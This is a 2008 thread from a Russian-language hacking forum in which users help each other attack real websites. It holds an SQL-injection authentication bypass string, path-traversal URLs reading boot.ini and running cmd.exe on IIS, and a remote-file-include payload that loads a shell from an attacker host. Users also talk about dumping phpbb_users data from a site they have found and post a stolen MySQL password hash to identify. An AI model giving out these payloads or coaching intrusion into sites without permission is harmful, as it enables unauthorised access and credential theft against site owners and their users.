HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1221  
Старый 16.03.2008, 17:16
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

дядя blackybr шарит . папсов видно издалека. Это ж не простая скуля. асю дашь?
 
Ответить с цитированием

  #1222  
Старый 16.03.2008, 17:44
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Если в авторизации - попробуй что-нить из серии ' and 1=1/* '-- и т.п., т.е. закрываешь аргумент, дописываешь всегда верное условие или просто комментируешь остальной код. Ну это чтоб обойти авторизацию)
 
Ответить с цитированием

  #1223  
Старый 16.03.2008, 19:45
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

есть уязвимость на чтение файлов типа http://site.ru/?page=../../../../../../../../boot.ini. Гдето прочитал что таким способом можна заюзать cmd. Обьясните плз.

For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be:

http://server.com/scripts/..%5c../Windows/System32/
cmd.exe?/c+dir+c:\

The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command "dir c:\" in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character "\".

пробовал как написано не работает

Последний раз редактировалось 4y4o; 16.03.2008 в 20:09..
 
Ответить с цитированием

  #1224  
Старый 16.03.2008, 22:00
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

Нашел сайт с sql инекцией. на сайте есть форум phpbb делаю запрос на вывод данных bla,bla+from+phpbb_users.. вообщем все как обычно но выводит данные другого phpbb. Ладно думаю я сервак один можно через другой форум тоже много чего на делать. но не могу найти сам адрес второго форума.. revers ip пока зывает еще неск сайтов но опять же нету там того форума... Как мне его найти уже пробовал в поисковиках icq,email полmзователей искать не помогло
 
Ответить с цитированием

  #1225  
Старый 16.03.2008, 22:18
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

4y4o, для начала надо убедица, что на удаленном серве стоит винда, а не никсы например. А потом подбирать путь до cmd.

m0use, попробуй inurl:tvoysite.com и смотри чего там проиндексировано. И ещё на archive.org посмотри старые версии сайта, мож там будут ссылки.
 
Ответить с цитированием

  #1226  
Старый 16.03.2008, 22:20
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

зайди вот сюда
http://madnet.name/tools/madss/
введи свой сайт и получиш список сайтов этого же сервака
Ну а там все понятно
и тем более -откуда ты уверен что сам форум под эту базу еще жив
может база от старого или еще че нить

Последний раз редактировалось neon_fx; 16.03.2008 в 22:36..
 
Ответить с цитированием

  #1227  
Старый 16.03.2008, 23:34
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

n0ne там стоит винда и пусть к смд я подобрал. вопрос как эксплуатировать смд через вэб интерфейс. Windows/System32/cmd.exe?/c+dir+c:\ не работает. Я спросил есть ли ещё варианты читай внимательней.
 
Ответить с цитированием

  #1228  
Старый 17.03.2008, 11:59
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Цитата:
есть уязвимость на чтение файлов типа http://site.ru/?page=../../../../../../../../boot.ini
Чтение еще не значит исполнение. Возможно, там только инклуд. Попробуй заюзать что-то типа
http://site.ru/?page=http://h4x0r.net/shell.php
 
Ответить с цитированием

  #1229  
Старый 17.03.2008, 14:33
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от m0use  
Нашел сайт с sql инекцией. на сайте есть форум phpbb делаю запрос на вывод данных bla,bla+from+phpbb_users.. вообщем все как обычно но выводит данные другого phpbb. Ладно думаю я сервак один можно через другой форум тоже много чего на делать. но не могу найти сам адрес второго форума.. revers ip пока зывает еще неск сайтов но опять же нету там того форума... Как мне его найти уже пробовал в поисковиках icq,email полmзователей искать не помогло
Какая версия бд?
__________________
..
 
Ответить с цитированием

  #1230  
Старый 17.03.2008, 18:40
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

Что за тип хэша *02A4DF6067015EA7070ACE86D62DE48C0BCADA75?
Слил с mysql 4.1.22.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ